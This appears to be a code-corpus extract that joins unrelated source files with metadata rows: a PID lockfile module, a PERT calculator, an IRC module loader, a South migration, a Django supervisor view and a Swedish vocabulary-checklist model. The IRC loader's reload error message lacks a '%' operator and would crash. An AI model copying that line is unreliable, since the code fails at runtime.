""" Raised when parsing contents of PID file fails. """
class PIDLockFile(LinkFileLock, object):
""" Lockfile implemented as a Unix PID file.
The PID file is named by the attribute `path`. When locked,
the file will be created with a single line of text,
containing the process ID (PID) of the process that acquired
the lock.
The lock is acquired and maintained as per `LinkFileLock`.
"""
def read_pid(self):
""" Get the PID from the lock file.
"""
result = read_pid_from_pidfile(self.path)
return result
def acquire(self, *args, **kwargs):
""" Acquire the lock.
Locks the PID file then creates the PID file for this
lock. The `timeout` parameter is used as for the
`LinkFileLock` class.
"""
super(PIDLockFile, self).acquire(*args, **kwargs)
try:
write_pid_to_pidfile(self.path)
except OSError, exc:
error = LockFailed("%(exc)s" % vars())
raise error
def release(self):
""" Release the lock.
Removes the PID file then releases the lock, or raises an
error if the current process does not hold the lock.
"""
if self.i_am_locking():
remove_existing_pidfile(self.path)
super(PIDLockFile, self).release()
def break_lock(self):
""" Break an existing lock.
If the lock is held, breaks the lock and removes the PID
file.
"""
super(PIDLockFile, self).break_lock()
remove_existing_pidfile(self.path)
class TimeoutPIDLockFile(PIDLockFile):
""" Lockfile with default timeout, implemented as a Unix PID file.
This uses the ``PIDLockFile`` implementation, with the
following changes:
* The `acquire_timeout` parameter to the initialiser will be
used as the default `timeout` parameter for the `acquire`
method.
"""
def __init__(self, path, acquire_timeout=None, *args, **kwargs):
""" Set up the parameters of a DaemonRunnerLock. """
self.acquire_timeout = acquire_timeout
super(TimeoutPIDLockFile, self).__init__(path, *args, **kwargs)
def acquire(self, timeout=None, *args, **kwargs):
""" Acquire the lock. """
if timeout is None:
timeout = self.acquire_timeout
super(TimeoutPIDLockFile, self).acquire(timeout, *args, **kwargs)
def read_pid_from_pidfile(pidfile_path):
""" Read the PID recorded in the named PID file.
Read and return the numeric PID recorded as text in the named
PID file. If the PID file does not exist, return ``None``. If
the content is not a valid PID, raise ``PIDFileParseError``.
"""
pid = None
pidfile = None
try:
pidfile = open(pidfile_path, 'r')
except IOError, exc:
if exc.errno == errno.ENOENT:
pass
else:
raise
if pidfile:
# According to the FHS 2.3 section on PID files in ‘/var/run’:
#
# The file must consist of the process identifier in
# ASCII-encoded decimal, followed by a newline character. …
#
# Programs that read PID files should be somewhat flexible
# in what they accept; i.e., they should ignore extra
# whitespace, leading zeroes, absence of the trailing
# newline, or additional lines in the PID file.
line = pidfile.readline().strip()
try:
pid = int(line)
except ValueError:
raise PIDFileParseError(
"PID file %(pidfile_path)r contents invalid" % vars())
pidfile.close()
return pid
def write_pid_to_pidfile(pidfile_path):
""" Write the PID in the named PID file.
Get the numeric process ID (“PID”) of the current process
and write it to the named file as a line of text.
"""
open_flags = (os.O_CREAT | os.O_EXCL | os.O_WRONLY)
open_mode = (
((os.R_OK | os.W_OK) << 6) |
((os.R_OK) << 3) |
((os.R_OK)))
pidfile_fd = os.open(pidfile_path, open_flags, open_mode)
pidfile = os.fdopen(pidfile_fd, 'w')
# According to the FHS 2.3 section on PID files in ‘/var/run’:
#
# The file must consist of the process identifier in
# ASCII-encoded decimal, followed by a newline character. For
# example, if crond was process number 25, /var/run/crond.pid
# would contain three characters: two, five, and newline.
pid = os.getpid()
line = "%(pid)d\n" % vars()
pidfile.write(line)
pidfile.close()
def remove_existing_pidfile(pidfile_path):
""" Remove the named PID file if it exists.
Remove the named PID file. Ignore the condition if the file
does not exist, since that only means we are already in the
desired state.
"""
try:
os.remove(pidfile_path)
except OSError, exc:
if exc.errno == errno.ENOENT:
pass
else:
raise
| apache-2.0 | 2,624,831,999,551,938,600 | 28.944444 | 75 | 0.609884 | false | 4.080523 | false | false | false |
tapatron/pert-calc | pert.py | 1 | 3254 | #!/usr/bin/env python
# copyright (c) 2014 Stein Fletcher <[email protected]>
#
# Purpose: A simple utility to estimate tasks using PERT
# Usage:
# pert --tasks="1,2,4 5,7,11 7,11,22"
#
# which calculates the total duration (including risk) of 3 tasks
# task1: optimistic: 1, nominal: 2, pessimistic: 4
# task2: optimistic: 5, nominal: 7, pessimistic: 11
# task3: optimistic: 7, nominal: 11, pessimistic: 22
from math import pow, sqrt
import errno
import argparse
class Task(object):
def __init__(self, opt, nom, pes):
self.opt = opt
self.nom = nom
self.pes = pes
class Estimation:
def __init__(self):
self.tasks = []
def add_task(self, task):
self.tasks.append(task)
def get_duration(self):
return Calculator.total_duration(self.tasks)
def get_uncertainty(self):
return Calculator.total_uncertainty(self.tasks)
def get_estimate(self):
return Calculator.estimate(self.tasks)
def print_report(self):
for index, task in enumerate(self.tasks):
print "[{0}: (O:{1}), (N:{2}), (P:{3})] | duration: {4}, risk: {5}".format(
index + 1
, task.opt
, task.nom
, task.pes
, round(Calculator.expected_duration(task), 2)
, round(Calculator.uncertainty(task), 2)
)
print "Final estimate: {}".format(round(self.get_estimate(), 2))
class Calculator(object):
@staticmethod
def estimate(tasks):
return (Calculator.total_duration(tasks) +
Calculator.total_uncertainty(tasks))
@staticmethod
def total_duration(tasks):
return sum([Calculator.expected_duration(task) for task in tasks])
@staticmethod
def total_uncertainty(tasks):
return sqrt(sum([pow(Calculator.uncertainty(task), 2) for task in tasks]))
@staticmethod
def expected_duration(task):
return (task.opt + 4*task.nom + task.pes) / 6
@staticmethod
def uncertainty(task):
return (task.pes - task.opt) / 6
def main():
def validate_params(params):
task_list = params['tasks'].split()
if len(task_list) < 1:
print "No tasks specified"
parser.print_help()
exit(errno.EINVAL)
for element in task_list:
element_params = element.split(',')
if len(element_params) != 3:
print "Invalid number of task attributes"
parser.print_help()
exit(errno.EINVAL)
return task_list
parser = argparse.ArgumentParser(description='A command line PERT calculator for quick \'n dirty estimates')
parser.add_argument(
'--tasks',
help='a comma separated task list in the form "1,2,12 4,5,9 2,3,6", where whitespace separates tasks',
required=True)
args = vars(parser.parse_args())
tasks = validate_params(args)
estimation = Estimation()
for task in tasks:
attrs = [float(val) for val in task.split(',')]
t = Task(opt=attrs[0], nom=attrs[1], pes=attrs[2])
estimation.add_task(t)
estimation.print_report()
exit(0)
if __name__ == '__main__':
main()
| mit | 4,799,152,905,269,200,000 | 27.79646 | 112 | 0.594653 | false | 3.672686 | false | false | false |
hrkfdn/cherry | modules.py | 1 | 1938 | import inspect
import imp
from irc import IRCConn
from console import Console
MODULES = ["mod_tv", "mod_imdb", "mod_yt", "mod_weather", "mod_8ball", "mod_hlquery", "mod_kiez", "mod_wc", "mod_wa"]
class Modules():
# dictionary with modname mapped to (module, obj)
modules = {}
def instantiate(self, m):
for attr in dir(m):
attr = getattr(m, attr)
if(inspect.isclass(attr) and
inspect.getmodule(attr) == m and
issubclass(attr, BaseModule)):
return attr()
def __init__(self):
global MODULES
for s in MODULES:
self.load(s)
def load(self, name):
try:
m = __import__(name)
self.modules[name] = (m, self.instantiate(m))
print("Loaded %s." % name)
except Exception as e:
print("Could not load module %s: %s" % (name, e))
def reload(self):
for key, val in self.modules.items():
print("Reloading %s .." % (key))
try:
reloadedmod = imp.reload(val[0])
newinstance = self.instantiate(reloadedmod)
self.modules[key] = (reloadedmod, newinstance)
except Exception as e:
print("Could not reload module %s: %s" (key, e))
def onprivmsg(self, conn, sender, to, message):
for key, val in self.modules.items():
try:
val[1].onprivmsg(conn, sender, to, message)
except Exception as e:
excname = type(e).__name__
print("Error running privmsg() handler in %s: %s: %s" % (key, excname, e))
class BaseModule():
def onprivmsg(self, conn, sender, to, message):
pass
def extractarg(self, trigger, message):
if message.startswith(trigger):
_, arg = message.split(trigger, 1)
return arg.lstrip()
return None
| bsd-3-clause | -8,024,597,456,429,800,000 | 31.3 | 117 | 0.534572 | false | 3.852883 | false | false | false |
brente/djangocms-youtube-slider | djangocms_youtube_slider/south_migrations/0001_initial.py | 2 | 4426 | # -*- coding: utf-8 -*-
from south.db import db
from south.v2 import SchemaMigration
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'YoutubeVideoContainer'
db.create_table(u'cmsplugin_youtubevideocontainer', (
(u'cmsplugin_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['cms.CMSPlugin'], unique=True, primary_key=True)),
('description', self.gf('django.db.models.fields.CharField')(max_length=100, null=True, blank=True)),
))
db.send_create_signal(u'djangocms_youtube_slider', ['YoutubeVideoContainer'])
# Adding model 'YoutubeVideoSlide'
db.create_table(u'cmsplugin_youtubevideoslide', (
(u'cmsplugin_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['cms.CMSPlugin'], unique=True, primary_key=True)),
('slider', self.gf('django.db.models.fields.related.ForeignKey')(related_name='slides', to=orm['djangocms_youtube_slider.YoutubeVideoContainer'])),
('video_link', self.gf('django.db.models.fields.CharField')(max_length=200)),
))
db.send_create_signal(u'djangocms_youtube_slider', ['YoutubeVideoSlide'])
def backwards(self, orm):
# Deleting model 'YoutubeVideoContainer'
db.delete_table(u'cmsplugin_youtubevideocontainer')
# Deleting model 'YoutubeVideoSlide'
db.delete_table(u'cmsplugin_youtubevideoslide')
models = {
'cms.cmsplugin': {
'Meta': {'object_name': 'CMSPlugin'},
'changed_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '15', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.CMSPlugin']", 'null': 'True', 'blank': 'True'}),
'placeholder': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Placeholder']", 'null': 'True'}),
'plugin_type': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}),
'position': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
},
'cms.placeholder': {
'Meta': {'object_name': 'Placeholder'},
'default_width': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slot': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'})
},
u'djangocms_youtube_slider.youtubevideocontainer': {
'Meta': {'object_name': 'YoutubeVideoContainer', 'db_table': "u'cmsplugin_youtubevideocontainer'", '_ormbases': ['cms.CMSPlugin']},
u'cmsplugin_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['cms.CMSPlugin']", 'unique': 'True', 'primary_key': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'})
},
u'djangocms_youtube_slider.youtubevideoslide': {
'Meta': {'object_name': 'YoutubeVideoSlide', 'db_table': "u'cmsplugin_youtubevideoslide'", '_ormbases': ['cms.CMSPlugin']},
u'cmsplugin_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['cms.CMSPlugin']", 'unique': 'True', 'primary_key': 'True'}),
'slider': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'slides'", 'to': u"orm['djangocms_youtube_slider.YoutubeVideoContainer']"}),
'video_link': ('django.db.models.fields.CharField', [], {'max_length': '200'})
}
}
complete_apps = ['djangocms_youtube_slider'] | mit | 8,185,830,980,724,661,000 | 65.074627 | 167 | 0.607094 | false | 3.642798 | false | false | false |
sfu-fas/coursys | grad/views/manage_supervisors.py | 1 | 1865 | from courselib.auth import requires_role
from django.shortcuts import get_object_or_404, render
from grad.models import GradStudent, Supervisor, GradRequirement
from grad.forms import SupervisorForm, possible_supervisors
from django.contrib import messages
from log.models import LogEntry
from django.http import HttpResponseRedirect
from django.urls import reverse
@requires_role("GRAD")
def manage_supervisors(request, grad_slug):
grad = get_object_or_404(GradStudent, slug=grad_slug, program__unit__in=request.units)
supervisors = Supervisor.objects.filter(student=grad).select_related('supervisor')
supervisor_people = [s.supervisor for s in supervisors if s.supervisor]
if request.method == 'POST':
form = SupervisorForm(request.POST)
form.set_supervisor_choices(possible_supervisors([grad.program.unit], extras=supervisor_people, null=True))
if form.is_valid():
s = form.save(commit=False)
s.modified_by = request.user.username
s.student = grad
s.save()
messages.success(request, "Added committee member for %s." % (grad))
l = LogEntry(userid=request.user.username,
description="Added committee member %s for %s." % (s, grad.person.userid),
related_object=s)
l.save()
return HttpResponseRedirect(reverse('grad:manage_supervisors', kwargs={'grad_slug':grad_slug}))
else:
form = SupervisorForm()
form.set_supervisor_choices(possible_supervisors([grad.program.unit], extras=supervisor_people, null=True))
context = {
'form': form,
'supervisors': supervisors,
'grad': grad,
'can_edit': True,
}
return render(request, 'grad/manage_supervisors.html', context)
| gpl-3.0 | -9,047,068,081,236,019,000 | 44.487805 | 115 | 0.654155 | false | 4.045553 | false | false | false |
langcog/wordbank | instruments/schemas/Swedish_WG.py | 1 | 63685 | from django.db import models
from instruments.base import BaseTable
class Swedish_WG(BaseTable):
item_1_choices = [('understands', 'understands'), ('produces', 'produces')]
item_1 = models.CharField(max_length=11, choices=item_1_choices, null=True)
item_2_choices = [('understands', 'understands'), ('produces', 'produces')]
item_2 = models.CharField(max_length=11, choices=item_2_choices, null=True)
item_3_choices = [('understands', 'understands'), ('produces', 'produces')]
item_3 = models.CharField(max_length=11, choices=item_3_choices, null=True)
item_4_choices = [('understands', 'understands'), ('produces', 'produces')]
item_4 = models.CharField(max_length=11, choices=item_4_choices, null=True)
item_5_choices = [('understands', 'understands'), ('produces', 'produces')]
item_5 = models.CharField(max_length=11, choices=item_5_choices, null=True)
item_6_choices = [('understands', 'understands'), ('produces', 'produces')]
item_6 = models.CharField(max_length=11, choices=item_6_choices, null=True)
item_7_choices = [('understands', 'understands'), ('produces', 'produces')]
item_7 = models.CharField(max_length=11, choices=item_7_choices, null=True)
item_8_choices = [('understands', 'understands'), ('produces', 'produces')]
item_8 = models.CharField(max_length=11, choices=item_8_choices, null=True)
item_9_choices = [('understands', 'understands'), ('produces', 'produces')]
item_9 = models.CharField(max_length=11, choices=item_9_choices, null=True)
item_10_choices = [('understands', 'understands'), ('produces', 'produces')]
item_10 = models.CharField(max_length=11, choices=item_10_choices, null=True)
item_11_choices = [('understands', 'understands'), ('produces', 'produces')]
item_11 = models.CharField(max_length=11, choices=item_11_choices, null=True)
item_12_choices = [('understands', 'understands'), ('produces', 'produces')]
item_12 = models.CharField(max_length=11, choices=item_12_choices, null=True)
item_13_choices = [('understands', 'understands'), ('produces', 'produces')]
item_13 = models.CharField(max_length=11, choices=item_13_choices, null=True)
item_14_choices = [('understands', 'understands'), ('produces', 'produces')]
item_14 = models.CharField(max_length=11, choices=item_14_choices, null=True)
item_15_choices = [('understands', 'understands'), ('produces', 'produces')]
item_15 = models.CharField(max_length=11, choices=item_15_choices, null=True)
item_16_choices = [('understands', 'understands'), ('produces', 'produces')]
item_16 = models.CharField(max_length=11, choices=item_16_choices, null=True)
item_17_choices = [('understands', 'understands'), ('produces', 'produces')]
item_17 = models.CharField(max_length=11, choices=item_17_choices, null=True)
item_18_choices = [('understands', 'understands'), ('produces', 'produces')]
item_18 = models.CharField(max_length=11, choices=item_18_choices, null=True)
item_19_choices = [('understands', 'understands'), ('produces', 'produces')]
item_19 = models.CharField(max_length=11, choices=item_19_choices, null=True)
item_20_choices = [('understands', 'understands'), ('produces', 'produces')]
item_20 = models.CharField(max_length=11, choices=item_20_choices, null=True)
item_21_choices = [('understands', 'understands'), ('produces', 'produces')]
item_21 = models.CharField(max_length=11, choices=item_21_choices, null=True)
item_22_choices = [('understands', 'understands'), ('produces', 'produces')]
item_22 = models.CharField(max_length=11, choices=item_22_choices, null=True)
item_23_choices = [('understands', 'understands'), ('produces', 'produces')]
item_23 = models.CharField(max_length=11, choices=item_23_choices, null=True)
item_24_choices = [('understands', 'understands'), ('produces', 'produces')]
item_24 = models.CharField(max_length=11, choices=item_24_choices, null=True)
item_25_choices = [('understands', 'understands'), ('produces', 'produces')]
item_25 = models.CharField(max_length=11, choices=item_25_choices, null=True)
item_26_choices = [('understands', 'understands'), ('produces', 'produces')]
item_26 = models.CharField(max_length=11, choices=item_26_choices, null=True)
item_27_choices = [('understands', 'understands'), ('produces', 'produces')]
item_27 = models.CharField(max_length=11, choices=item_27_choices, null=True)
item_28_choices = [('understands', 'understands'), ('produces', 'produces')]
item_28 = models.CharField(max_length=11, choices=item_28_choices, null=True)
item_29_choices = [('understands', 'understands'), ('produces', 'produces')]
item_29 = models.CharField(max_length=11, choices=item_29_choices, null=True)
item_30_choices = [('understands', 'understands'), ('produces', 'produces')]
item_30 = models.CharField(max_length=11, choices=item_30_choices, null=True)
item_31_choices = [('understands', 'understands'), ('produces', 'produces')]
item_31 = models.CharField(max_length=11, choices=item_31_choices, null=True)
item_32_choices = [('understands', 'understands'), ('produces', 'produces')]
item_32 = models.CharField(max_length=11, choices=item_32_choices, null=True)
item_33_choices = [('understands', 'understands'), ('produces', 'produces')]
item_33 = models.CharField(max_length=11, choices=item_33_choices, null=True)
item_34_choices = [('understands', 'understands'), ('produces', 'produces')]
item_34 = models.CharField(max_length=11, choices=item_34_choices, null=True)
item_35_choices = [('understands', 'understands'), ('produces', 'produces')]
item_35 = models.CharField(max_length=11, choices=item_35_choices, null=True)
item_36_choices = [('understands', 'understands'), ('produces', 'produces')]
item_36 = models.CharField(max_length=11, choices=item_36_choices, null=True)
item_37_choices = [('understands', 'understands'), ('produces', 'produces')]
item_37 = models.CharField(max_length=11, choices=item_37_choices, null=True)
item_38_choices = [('understands', 'understands'), ('produces', 'produces')]
item_38 = models.CharField(max_length=11, choices=item_38_choices, null=True)
item_39_choices = [('understands', 'understands'), ('produces', 'produces')]
item_39 = models.CharField(max_length=11, choices=item_39_choices, null=True)
item_40_choices = [('understands', 'understands'), ('produces', 'produces')]
item_40 = models.CharField(max_length=11, choices=item_40_choices, null=True)
item_41_choices = [('understands', 'understands'), ('produces', 'produces')]
item_41 = models.CharField(max_length=11, choices=item_41_choices, null=True)
item_42_choices = [('understands', 'understands'), ('produces', 'produces')]
item_42 = models.CharField(max_length=11, choices=item_42_choices, null=True)
item_43_choices = [('understands', 'understands'), ('produces', 'produces')]
item_43 = models.CharField(max_length=11, choices=item_43_choices, null=True)
item_44_choices = [('understands', 'understands'), ('produces', 'produces')]
item_44 = models.CharField(max_length=11, choices=item_44_choices, null=True)
item_45_choices = [('understands', 'understands'), ('produces', 'produces')]
item_45 = models.CharField(max_length=11, choices=item_45_choices, null=True)
item_46_choices = [('understands', 'understands'), ('produces', 'produces')]
item_46 = models.CharField(max_length=11, choices=item_46_choices, null=True)
item_47_choices = [('understands', 'understands'), ('produces', 'produces')]
item_47 = models.CharField(max_length=11, choices=item_47_choices, null=True)
item_48_choices = [('understands', 'understands'), ('produces', 'produces')]
item_48 = models.CharField(max_length=11, choices=item_48_choices, null=True)
item_49_choices = [('understands', 'understands'), ('produces', 'produces')]
item_49 = models.CharField(max_length=11, choices=item_49_choices, null=True)
item_50_choices = [('understands', 'understands'), ('produces', 'produces')]
item_50 = models.CharField(max_length=11, choices=item_50_choices, null=True)
item_51_choices = [('understands', 'understands'), ('produces', 'produces')]
item_51 = models.CharField(max_length=11, choices=item_51_choices, null=True)
item_52_choices = [('understands', 'understands'), ('produces', 'produces')]
item_52 = models.CharField(max_length=11, choices=item_52_choices, null=True)
item_53_choices = [('understands', 'understands'), ('produces', 'produces')]
item_53 = models.CharField(max_length=11, choices=item_53_choices, null=True)
item_54_choices = [('understands', 'understands'), ('produces', 'produces')]
item_54 = models.CharField(max_length=11, choices=item_54_choices, null=True)
item_55_choices = [('understands', 'understands'), ('produces', 'produces')]
item_55 = models.CharField(max_length=11, choices=item_55_choices, null=True)
item_56_choices = [('understands', 'understands'), ('produces', 'produces')]
item_56 = models.CharField(max_length=11, choices=item_56_choices, null=True)
item_57_choices = [('understands', 'understands'), ('produces', 'produces')]
item_57 = models.CharField(max_length=11, choices=item_57_choices, null=True)
item_58_choices = [('understands', 'understands'), ('produces', 'produces')]
item_58 = models.CharField(max_length=11, choices=item_58_choices, null=True)
item_59_choices = [('understands', 'understands'), ('produces', 'produces')]
item_59 = models.CharField(max_length=11, choices=item_59_choices, null=True)
item_60_choices = [('understands', 'understands'), ('produces', 'produces')]
item_60 = models.CharField(max_length=11, choices=item_60_choices, null=True)
item_61_choices = [('understands', 'understands'), ('produces', 'produces')]
item_61 = models.CharField(max_length=11, choices=item_61_choices, null=True)
item_62_choices = [('understands', 'understands'), ('produces', 'produces')]
item_62 = models.CharField(max_length=11, choices=item_62_choices, null=True)
item_63_choices = [('understands', 'understands'), ('produces', 'produces')]
item_63 = models.CharField(max_length=11, choices=item_63_choices, null=True)
item_64_choices = [('understands', 'understands'), ('produces', 'produces')]
item_64 = models.CharField(max_length=11, choices=item_64_choices, null=True)
item_65_choices = [('understands', 'understands'), ('produces', 'produces')]
item_65 = models.CharField(max_length=11, choices=item_65_choices, null=True)
item_66_choices = [('understands', 'understands'), ('produces', 'produces')]
item_66 = models.CharField(max_length=11, choices=item_66_choices, null=True)
item_67_choices = [('understands', 'understands'), ('produces', 'produces')]
item_67 = models.CharField(max_length=11, choices=item_67_choices, null=True)
item_68_choices = [('understands', 'understands'), ('produces', 'produces')]
item_68 = models.CharField(max_length=11, choices=item_68_choices, null=True)
item_69_choices = [('understands', 'understands'), ('produces', 'produces')]
item_69 = models.CharField(max_length=11, choices=item_69_choices, null=True)
item_70_choices = [('understands', 'understands'), ('produces', 'produces')]
item_70 = models.CharField(max_length=11, choices=item_70_choices, null=True)
item_71_choices = [('understands', 'understands'), ('produces', 'produces')]
item_71 = models.CharField(max_length=11, choices=item_71_choices, null=True)
item_72_choices = [('understands', 'understands'), ('produces', 'produces')]
item_72 = models.CharField(max_length=11, choices=item_72_choices, null=True)
item_73_choices = [('understands', 'understands'), ('produces', 'produces')]
item_73 = models.CharField(max_length=11, choices=item_73_choices, null=True)
item_74_choices = [('understands', 'understands'), ('produces', 'produces')]
item_74 = models.CharField(max_length=11, choices=item_74_choices, null=True)
item_75_choices = [('understands', 'understands'), ('produces', 'produces')]
item_75 = models.CharField(max_length=11, choices=item_75_choices, null=True)
item_76_choices = [('understands', 'understands'), ('produces', 'produces')]
item_76 = models.CharField(max_length=11, choices=item_76_choices, null=True)
item_77_choices = [('understands', 'understands'), ('produces', 'produces')]
item_77 = models.CharField(max_length=11, choices=item_77_choices, null=True)
item_78_choices = [('understands', 'understands'), ('produces', 'produces')]
item_78 = models.CharField(max_length=11, choices=item_78_choices, null=True)
item_79_choices = [('understands', 'understands'), ('produces', 'produces')]
item_79 = models.CharField(max_length=11, choices=item_79_choices, null=True)
item_80_choices = [('understands', 'understands'), ('produces', 'produces')]
item_80 = models.CharField(max_length=11, choices=item_80_choices, null=True)
item_81_choices = [('understands', 'understands'), ('produces', 'produces')]
item_81 = models.CharField(max_length=11, choices=item_81_choices, null=True)
item_82_choices = [('understands', 'understands'), ('produces', 'produces')]
item_82 = models.CharField(max_length=11, choices=item_82_choices, null=True)
item_83_choices = [('understands', 'understands'), ('produces', 'produces')]
item_83 = models.CharField(max_length=11, choices=item_83_choices, null=True)
item_84_choices = [('understands', 'understands'), ('produces', 'produces')]
item_84 = models.CharField(max_length=11, choices=item_84_choices, null=True)
item_85_choices = [('understands', 'understands'), ('produces', 'produces')]
item_85 = models.CharField(max_length=11, choices=item_85_choices, null=True)
item_86_choices = [('understands', 'understands'), ('produces', 'produces')]
item_86 = models.CharField(max_length=11, choices=item_86_choices, null=True)
item_87_choices = [('understands', 'understands'), ('produces', 'produces')]
item_87 = models.CharField(max_length=11, choices=item_87_choices, null=True)
item_88_choices = [('understands', 'understands'), ('produces', 'produces')]
item_88 = models.CharField(max_length=11, choices=item_88_choices, null=True)
item_89_choices = [('understands', 'understands'), ('produces', 'produces')]
item_89 = models.CharField(max_length=11, choices=item_89_choices, null=True)
item_90_choices = [('understands', 'understands'), ('produces', 'produces')]
item_90 = models.CharField(max_length=11, choices=item_90_choices, null=True)
item_91_choices = [('understands', 'understands'), ('produces', 'produces')]
item_91 = models.CharField(max_length=11, choices=item_91_choices, null=True)
item_92_choices = [('understands', 'understands'), ('produces', 'produces')]
item_92 = models.CharField(max_length=11, choices=item_92_choices, null=True)
item_93_choices = [('understands', 'understands'), ('produces', 'produces')]
item_93 = models.CharField(max_length=11, choices=item_93_choices, null=True)
item_94_choices = [('understands', 'understands'), ('produces', 'produces')]
item_94 = models.CharField(max_length=11, choices=item_94_choices, null=True)
item_95_choices = [('understands', 'understands'), ('produces', 'produces')]
item_95 = models.CharField(max_length=11, choices=item_95_choices, null=True)
item_96_choices = [('understands', 'understands'), ('produces', 'produces')]
item_96 = models.CharField(max_length=11, choices=item_96_choices, null=True)
item_97_choices = [('understands', 'understands'), ('produces', 'produces')]
item_97 = models.CharField(max_length=11, choices=item_97_choices, null=True)
item_98_choices = [('understands', 'understands'), ('produces', 'produces')]
item_98 = models.CharField(max_length=11, choices=item_98_choices, null=True)
item_99_choices = [('understands', 'understands'), ('produces', 'produces')]
item_99 = models.CharField(max_length=11, choices=item_99_choices, null=True)
item_100_choices = [('understands', 'understands'), ('produces', 'produces')]
item_100 = models.CharField(max_length=11, choices=item_100_choices, null=True)
item_101_choices = [('understands', 'understands'), ('produces', 'produces')]
item_101 = models.CharField(max_length=11, choices=item_101_choices, null=True)
item_102_choices = [('understands', 'understands'), ('produces', 'produces')]
item_102 = models.CharField(max_length=11, choices=item_102_choices, null=True)
item_103_choices = [('understands', 'understands'), ('produces', 'produces')]
item_103 = models.CharField(max_length=11, choices=item_103_choices, null=True)
item_104_choices = [('understands', 'understands'), ('produces', 'produces')]
item_104 = models.CharField(max_length=11, choices=item_104_choices, null=True)
item_105_choices = [('understands', 'understands'), ('produces', 'produces')]
item_105 = models.CharField(max_length=11, choices=item_105_choices, null=True)
item_106_choices = [('understands', 'understands'), ('produces', 'produces')]
item_106 = models.CharField(max_length=11, choices=item_106_choices, null=True)
item_107_choices = [('understands', 'understands'), ('produces', 'produces')]
item_107 = models.CharField(max_length=11, choices=item_107_choices, null=True)
item_108_choices = [('understands', 'understands'), ('produces', 'produces')]
item_108 = models.CharField(max_length=11, choices=item_108_choices, null=True)
item_109_choices = [('understands', 'understands'), ('produces', 'produces')]
item_109 = models.CharField(max_length=11, choices=item_109_choices, null=True)
item_110_choices = [('understands', 'understands'), ('produces', 'produces')]
item_110 = models.CharField(max_length=11, choices=item_110_choices, null=True)
item_111_choices = [('understands', 'understands'), ('produces', 'produces')]
item_111 = models.CharField(max_length=11, choices=item_111_choices, null=True)
item_112_choices = [('understands', 'understands'), ('produces', 'produces')]
item_112 = models.CharField(max_length=11, choices=item_112_choices, null=True)
item_113_choices = [('understands', 'understands'), ('produces', 'produces')]
item_113 = models.CharField(max_length=11, choices=item_113_choices, null=True)
item_114_choices = [('understands', 'understands'), ('produces', 'produces')]
item_114 = models.CharField(max_length=11, choices=item_114_choices, null=True)
item_115_choices = [('understands', 'understands'), ('produces', 'produces')]
item_115 = models.CharField(max_length=11, choices=item_115_choices, null=True)
item_116_choices = [('understands', 'understands'), ('produces', 'produces')]
item_116 = models.CharField(max_length=11, choices=item_116_choices, null=True)
item_117_choices = [('understands', 'understands'), ('produces', 'produces')]
item_117 = models.CharField(max_length=11, choices=item_117_choices, null=True)
item_118_choices = [('understands', 'understands'), ('produces', 'produces')]
item_118 = models.CharField(max_length=11, choices=item_118_choices, null=True)
item_119_choices = [('understands', 'understands'), ('produces', 'produces')]
item_119 = models.CharField(max_length=11, choices=item_119_choices, null=True)
item_120_choices = [('understands', 'understands'), ('produces', 'produces')]
item_120 = models.CharField(max_length=11, choices=item_120_choices, null=True)
item_121_choices = [('understands', 'understands'), ('produces', 'produces')]
item_121 = models.CharField(max_length=11, choices=item_121_choices, null=True)
item_122_choices = [('understands', 'understands'), ('produces', 'produces')]
item_122 = models.CharField(max_length=11, choices=item_122_choices, null=True)
item_123_choices = [('understands', 'understands'), ('produces', 'produces')]
item_123 = models.CharField(max_length=11, choices=item_123_choices, null=True)
item_124_choices = [('understands', 'understands'), ('produces', 'produces')]
item_124 = models.CharField(max_length=11, choices=item_124_choices, null=True)
item_125_choices = [('understands', 'understands'), ('produces', 'produces')]
item_125 = models.CharField(max_length=11, choices=item_125_choices, null=True)
item_126_choices = [('understands', 'understands'), ('produces', 'produces')]
item_126 = models.CharField(max_length=11, choices=item_126_choices, null=True)
item_127_choices = [('understands', 'understands'), ('produces', 'produces')]
item_127 = models.CharField(max_length=11, choices=item_127_choices, null=True)
item_128_choices = [('understands', 'understands'), ('produces', 'produces')]
item_128 = models.CharField(max_length=11, choices=item_128_choices, null=True)
item_129_choices = [('understands', 'understands'), ('produces', 'produces')]
item_129 = models.CharField(max_length=11, choices=item_129_choices, null=True)
item_130_choices = [('understands', 'understands'), ('produces', 'produces')]
item_130 = models.CharField(max_length=11, choices=item_130_choices, null=True)
item_131_choices = [('understands', 'understands'), ('produces', 'produces')]
item_131 = models.CharField(max_length=11, choices=item_131_choices, null=True)
item_132_choices = [('understands', 'understands'), ('produces', 'produces')]
item_132 = models.CharField(max_length=11, choices=item_132_choices, null=True)
item_133_choices = [('understands', 'understands'), ('produces', 'produces')]
item_133 = models.CharField(max_length=11, choices=item_133_choices, null=True)
item_134_choices = [('understands', 'understands'), ('produces', 'produces')]
item_134 = models.CharField(max_length=11, choices=item_134_choices, null=True)
item_135_choices = [('understands', 'understands'), ('produces', 'produces')]
item_135 = models.CharField(max_length=11, choices=item_135_choices, null=True)
